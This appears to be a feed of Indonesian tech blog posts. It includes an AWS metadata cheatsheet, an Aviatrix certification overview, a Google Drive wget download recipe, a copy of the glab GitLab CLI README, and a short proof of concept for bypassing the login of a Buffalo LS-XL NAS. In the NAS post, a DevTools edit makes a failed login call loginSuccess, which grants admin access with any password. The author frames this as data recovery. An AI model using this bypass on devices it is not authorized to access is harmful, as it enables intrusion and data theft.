Dani Gunawan Reading time ~1 minute

Kumpulan Cheatsheet AWS CLI

 
* Get IP Private EC2
curl -s http://169.254.169.254/latest/meta-data/local-ipv4
Dani Gunawan Reading time ~2 minutes

Aviatrix Certified Engineer - Multicloud Network Associate

Sertifikasi Aviatrix adalah program sertifikasi yang disediakan oleh Aviatrix Systems Inc., sebuah perusahaan teknologi yang mengkhususkan diri dalam solusi jaringan cloud. Program sertifikasi Aviatrix dirancang untuk memvalidasi pengetahuan dan keterampilan individu dalam mengimplementasikan, mengelola, dan mengamankan jaringan cloud menggunakan solusi Aviatrix.

Sertifikasi Aviatrix memiliki beberapa tingkatan yang mencakup berbagai aspek jaringan cloud, termasuk desain arsitektur, konfigurasi, troubleshooting, keamanan, dan pengelolaan. Beberapa contoh sertifikasi Aviatrix termasuk:

  • Aviatrix Certified Engineer (ACE): Sertifikasi ini ditujukan untuk individu yang ingin memvalidasi pemahaman mereka tentang konsep dasar, fitur, dan fungsionalitas solusi Aviatrix. Ini mencakup pengetahuan tentang jaringan cloud, konfigurasi peering, VPN, keamanan, dan pengelolaan Aviatrix Controller.

  • Aviatrix Certified Engineer - Multi-Cloud Network Associate (ACE-MCNA): Sertifikasi ini ditujukan untuk individu yang ingin memperdalam pemahaman mereka tentang desain dan implementasi jaringan multi-cloud menggunakan solusi Aviatrix. Ini mencakup topik seperti desain transit networking, penghubung jaringan lintas wilayah, dan integrasi dengan penyedia cloud utama.

Sertifikasi Aviatrix dapat memberikan manfaat dalam meningkatkan pemahaman dan keterampilan dalam mengelola jaringan cloud, serta membantu membedakan diri dalam industri. Namun, penting untuk menyelidiki persyaratan, materi ujian, dan sumber daya pelatihan yang disediakan oleh Aviatrix untuk setiap jenis sertifikasi yang Anda minati.

Aviatrix Certified Engineer Multicloud Network Associate

Sertifikasi dan Pelatihan Aviatrix Certified Engineer Multicloud Network Associate adalah titik awal untuk belajar security dan networking dalam lingkungan multicloud Anda.

Pelatihan ini mencakup komponen jaringan dasar dan terminologi penyedia layanan cloud utama seperti (AWS, Azure, Google Cloud Platform, dan Oracle Cloud Infrastructure) dan membahas tantangan umum dan batasan utama saat menggunakan infrastruktur cloud publik.

Pelatihan merinci pola desain yang telah terbukti untuk arsitektur multicloud dan jaringan utama serta kasus penggunaan keamanan – termasuk memfilter data akses keluar, VPN, jaringan transit, keamanan firewall, enkripsi, dan banyak lagi.

Table of contents

Objectives

• Mengembangkan arsitektur untuk jaringan multicloud Anda

• Memperluas konstruksi jaringan cloud asli

• Mengintegrasikan vendor firewall generasi berikutnya yang Anda pilih ke dalam arsitektur jaringan Anda

• Memungkinkan akses berbasis profil ke aplikasi dan sumber daya cloud

• Menggunakan layanan transit networking untuk mengintegrasikan VPC/VNet cloud dan sumber daya on-premise

• Mengimplementasikan enkripsi kinerja tinggi untuk data yang sedang bergerak

• Mendapatkan visibilitas, pemantauan global, dan memecahkan masalah dengan efisien pada jaringan cloud Anda

Scope

pelatihan dan sertifikasi ini cocok bagi anda yang berkecimpung di dunia cloud network seperti :

• Cloud Architects

• Cloud Engineers

• Network Architects

• Network Engineers

• Operations Teams

• DevOps Teams

Prerequisites

Pengetahuan dasar tentang konsep jaringan dan keamanan sangat membantu tetapi tidak diperlukan.

Refferences

https://aviatrix.com/ace-associate/

Dani Gunawan Reading time ~1 minute

Salin link tautan untuk berbagi misal

 
https://drive.google.com/file/d/1UibyVC_C2hoT_XEw15gPEwPW4yFyJFKaSs/view?usp=sharing

Ekstraksi bagian UNIKID link google drive

 

1UibyVC_C2hoT_XEw15gPEwPW4yFyJFKaSs

Jika file yang diunduh berukuran kecil jalankan perintah berikut di terminal:

 
wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=UNIKID' -O FILENAME

ubahlah UNIKID dengan id di atas diekstraksi dan ganti nama FILENAME untuk penggunaan mudah Anda sendiri. Untuk file lagre jalankan perintah berikut dengan perubahan yang diperlukan dalam UNIKID dan FILENAME:

 

wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=UNIKID' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=UNIKID" -O FILENAME && rm -rf /tmp/cookies.txt
Dani Gunawan Reading time ~1 minute

Singkat cerita saya membutuhkan akses ke NAS buffalo ls-xl ini yang dimana tipe nas ini sudah sangat jadul akses untuk factory reset dan ganti password pun harus punya master aksesnya dan ternyata master aksesnya lupa sempat frustasi karena harus ada penyelamatan data dan data tersebut data penting perusahaan, sudah cek SN pun di official sudah tidak terdaftar sempat berpikir, why? sehingga saya sedikit pengkodean kreatif untuk coba menyelamatkan. Dan ternyata setelah observasi percobaan pentest, NAS memiliki vulnerability dan exploit melalui injeksi langsung devtools.

Table of contents

PoC

Berikut tahapan-tahapan nya:

  • Buka halaman login NAS LS-XL (via IP)
  • Menggunakan DevTools Chrome dan buka pada bagian sources
  • Buka file login_utis.js yang berada pada folder authentication

Dan coba modifikasi code dengan membypass fungsi loginSuccess, hanya memodifikasi bagian kode dibawah ini saja :

function login(f, lang) {
  if(login_lock != 0) {
    return;
  }
  login_lock = 1;
  var uid = Ext.getCmp('user');
  var uid_value = uid.getValue();
  var pwd = Ext.getCmp('password');
  var pwd_value = pwd.getValue();

  f.form.submit({
    url: '/dynamic.pl',
    params: {
      bufaction: 'verifyLogin'
    },
    waitTitle: S('Please Wait...'),
    waitMsg: S('Logging In...'),
    success: function(form, action) {
      var decodedResponse = Ext.decode(action.response.responseText);
      var jsonData = decodedResponse.data;
      loginSuccess(f, action, uid_value, lang);
    },
    failure: function(form, action) {
      loginSuccess(f, action, uid_value, lang);
    }
  });
};
  • Save Ctrl+S
  • login dengan username admin dengan password bebas
  • Reset akun admin dengan password baru

Terdapat keamanan yang buruk pada NAS dalam hal ini dapat mensolusikan penyelamatan data, saya sengaja melakukan ini dan pentest karena terdesak dan data tersebut penting. mohon untuk tidak dicoba-coba untuk digunakan dengan hal yang tidak diinginkan ya saya disini hanya share untuk penyelamatan data saja dan buntu.

Remediasi

Tidak untuk dicoba-coba segera untuk anda pemilik NAS simpan password dan akun master anda jangan sampai lupa, dan lakukan langsung update patching software terbaru dari official vendor NAS anda.

Dani Gunawan Reading time ~8 minutes

GLab

Go Report Card Coverage Mentioned in Awesome Go Gitpod Ready-to-Code

GLab is an open source GitLab CLI tool bringing GitLab to your terminal next to where you are already working with git and your code without switching between windows and browser tabs. Work with issues, merge requests, watch running pipelines directly from your CLI among other features.

glab is available for repositories hosted on GitLab.com and self-managed GitLab instances. glab supports multiple authenticated GitLab instances and automatically detects the authenticated hostname from the remotes available in the working Git directory.

command example

Table of contents

Usage

To get started with glab:

  1. Follow the installation instructions appropriate for your operating system.
  2. Authenticate into your instance of GitLab.
  3. Optional. Configure glab further to meet your needs:

You’re ready! Run glab --help to view a list of core commands. Commands follow this pattern:

glab <command> <subcommand> [flags]

Many core commands also have sub-commands. Some examples:

  • List merge requests assigned to you: glab mr list --assignee=@me
  • List review requests for you: glab mr list --reviewer=@me
  • Approve a merge request: glab mr approve 235
  • Create an issue, and add milestone, title, and label: glab issue create -m release-2.0.0 -t "My title here" --label important

Demo

asciicast

Documentation

Read the documentation for usage instructions or check out glab help.

Installation

Download a binary suitable for your OS at the releases page. Other installation methods depend on your operating system.

macOS

  • Homebrew (officially supported)
    • Install with: brew install glab
    • Update with: brew upgrade glab
  • MacPorts:
    • Install with: sudo port install glab
    • Update with: sudo port selfupdate && sudo port upgrade glab

  • Install into usr/bin with a shell script: curl -s "https://gitlab.com/gitlab-org/cli/-/raw/main/scripts/install.sh" | sudo sh

    Before running any install script, review its contents.

Windows

  • WinGet
    • Install with: winget install glab.glab
    • Update with: winget install glab.glab
  • scoop
    • Install with: scoop install glab
    • Update with: scoop update glab
  • Download an EXE installer or the glab.exe binary from the releases page

Linux

Homebrew

Installing from Homebrew is the officially supported installation method for Linux.

  • Install with: brew install glab
  • Update with: brew upgrade glab

Snapcraft (out of date)

To install glab from the Snap Store:

  1. Make sure you have snap installed on your Linux distribution.
  2. Install the package: sudo snap install --edge glab
  3. Grant glab access to SSH keys: sudo snap connect glab:ssh-keys

Download from the Snap Store

Arch Linux

For Arch Linux, glab is available:

Alpine Linux

glab is available on the Alpine Community Repository as glab.

When installing, use --no-cache so no apk update is required:

apk add --no-cache glab
Install a pinned version from edge

To ensure that by default edge is used to get the latest updates. We need the edge repository in /etc/apk/repositories.

Afterwards you can install it with apk add --no-cache glab@edge

We use --no-cache so an apk update is not required.

echo "@edge http://dl-cdn.alpinelinux.org/alpine/edge/community" >> /etc/apk/repositories
apk add --no-cache glab@edge
Alpine Linux Docker-way

Use edge directly

FROM alpine:3.13
RUN apk add --no-cache glab

Fetching latest glab version from edge

FROM alpine:3.13
RUN echo "@edge http://dl-cdn.alpinelinux.org/alpine/edge/community" >> /etc/apk/repositories
RUN apk add --no-cache glab@edge

Nix/NixOS

Nix (NixOS) users can install from nixpkgs with the command nix-env -iA nixos.glab.

MPR (Debian/Ubuntu)

glab is available inside the makedeb package repository. To install, run the following:

git clone 'https://mpr.makedeb.org/glab'
cd glab/
makedeb -si
Prebuilt-MPR

The above method downloads glab from source and builds it before packaging it into a .deb package. If you don’t want to compile or just want a prebuilt package, you can also install glab from the Prebuilt-MPR:

  1. Set up the Prebuilt-MPR on your system.
  2. Install with the command sudo apt install glab.

Spack

  • To install: spack install glab.
  • To update: spack uninstall glab && spack install glab

Building from source

If a supported binary for your OS is not found at the releases page, you can build from source:

Prerequisites for building from source

  • make
  • Go 1.18+

To build from source:

  1. Run the command go version to verify that Go version 1.18 or later is installed. If go is not installed, follow instructions on the Go website.
  2. Clone this repository: git clone https://gitlab.com/gitlab-org/cli.git glab
  3. Change into the project directory: cd glab
  4. If you have $GOPATH/bin or $GOBIN in your $PATH, run make install to install in $GOPATH/bin).
  5. If you do not have $GOPATH/bin or $GOBIN in your $PATH:
    1. Run make to build the project.
    2. Run export PATH=$PWD/bin:$PATH to update your PATH with the newly compiled project.
  6. Run glab version to confirm that it worked.

Authentication

To authenticate your installation of glab:

  1. Get a GitLab personal access token with at least the api and write_repository scopes. Use the method appropriate for your instance:
    • For GitLab.com, create one at the Personal access tokens page.
    • For self-managed instances, visit https://gitlab.example.com/-/profile/personal_access_tokens, modifying gitlab.example.com to match the domain name of your instance.
  2. Start interactive setup: glab auth login
  3. Authenticate with the method appropriate for your GitLab instance:
    • For GitLab SaaS, authenticate against gitlab.com by reading the token from a file: glab auth login --stdin < myaccesstoken.txt
    • For self-managed instances, authenticate by reading from a file: glab auth login --hostname salsa.debian.org --stdin < myaccesstoken.txt
    • Authenticate with token and hostname: glab auth login --hostname gitlab.example.org --token xxxxx Not recommended for shared environments.

Configuration

By default, glab follows the XDG Base Directory Spec. Configure it globally, locally, or per-host:

  • Globally: run glab config set --global editor vim.
    • The global configuration file is available at ~/.config/glab-cli.
    • To override this location, set the GLAB_CONFIG_DIR environment variable.
  • The current directory: run glab config set editor vim in any folder in a Git repository.
    • The local configuration file is available at .git/glab-cli in the current working Git directory.
  • Per host: run glab config set editor vim --host gitlab.example.org, changing the --host parameter to meet your needs.
    • Per-host configuration info is always stored in the global configuration file, with or without the global flag.

Environment variables

  • GITLAB_TOKEN: an authentication token for API requests. Setting this avoids being prompted to authenticate and overrides any previously stored credentials. Can be set in the config with glab config set token xxxxxx
  • GITLAB_URI or GITLAB_HOST: specify the URL of the GitLab server if self-managed (eg: https://gitlab.example.com). Default is https://gitlab.com.
  • GITLAB_API_HOST: specify the host where the API endpoint is found. Useful when there are separate (sub)domains or hosts for Git and the API endpoint: defaults to the hostname found in the Git URL
  • GITLAB_REPO: Default GitLab repository used for commands accepting the --repo option. Only used if no --repo option is given.
  • GITLAB_GROUP: Default GitLab group used for listing merge requests, issues and variables. Only used if no --group option is given.
  • REMOTE_ALIAS or GIT_REMOTE_URL_VAR: git remote variable or alias that contains the GitLab URL. Can be set in the config with glab config set remote_alias origin
  • VISUAL, EDITOR (in order of precedence): the editor tool to use for authoring text. Can be set in the config with glab config set editor vim
  • BROWSER: the web browser to use for opening links. Can be set in the configuration with glab config set browser mybrowser
  • GLAMOUR_STYLE: environment variable to set your desired Markdown renderer style Available options are (dark|light|notty) or set a custom style
  • NO_COLOR: set to any value to avoid printing ANSI escape sequences for color output.
  • FORCE_HYPERLINKS: set to 1 to force hyperlinks to be output, even when not outputting to a TTY

stage: Create group: Code Review info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/product/ux/technical-writing/#assignments —

GitLab CLI - glab

GLab is an open source GitLab CLI tool. It brings GitLab to your terminal: next to where you are already working with Git and your code, without switching between windows and browser tabs.

  • Work with issues.
  • Work with merge requests.
  • Watch running pipelines directly from your CLI.

command example

The GitLab CLI uses commands structured like glab <command> <subcommand> [flags] to perform many of the actions you normally do from the GitLab user interface:

# Sign in
glab auth login --stdin < token.txt

# View a list of issues
glab issue list

# Create merge request for issue 123
glab mr for 123

# Check out the branch for merge request 243
glab mr checkout 243

# Watch the pipeline in progress
glab pipeline ci view

# View, approve, and merge the merge request
glab mr view
glab mr approve
glab mr merge

Core commands

  • glab alias
  • glab api
  • glab auth
  • glab ci
  • glab issue
  • glab label
  • glab mr
  • glab project
  • glab release
  • glab snippet
  • glab ssh-key
  • glab user
  • glab variable

Install the CLI

Installation instructions are available in the GLab README.

Authenticate with GitLab

To authenticate with your GitLab account, run glab auth login. glab respects tokens set using GITLAB_TOKEN.

Report issues

Open an issue in the gitlab-org/cli repository to send us feedback.

Clone With Gitlab Self Hosted (PoC)

  • glab auth login
  • select self hosted
  • using https method and your token access
  • use the command below
 
GITLAB_HOST=GITLAB_SELF_HOSTED glab repo clone groupname/path/project_name
GITLAB_HOST=GITLAB_SELF_HOSTED glab repo clone yourgitlabname/project_name
- Clone by group subdir with namespace
GITLAB_HOST=GITLAB_SELF_HOSTED glab repo clone -g groupname/subdir -paginate
- Clone all by group name with namespace   
GITLAB_HOST=GITLAB_SELF_HOSTED glab repo clone -g groupname -p
- Cloner all and subdir by group name with namespace 
GITLAB_HOST=GITLAB_SELF_HOSTED glab repo clone -g groupname/subdir/pathname -p

Refferences :

  • Install: https://gitlab.com/gitlab-org/cli/#installation
  • CLI : https://gitlab.com/gitlab-org/cli/-/blob/main/docs/source/repo/clone.md
  • Demo : https://asciinema.org/a/368622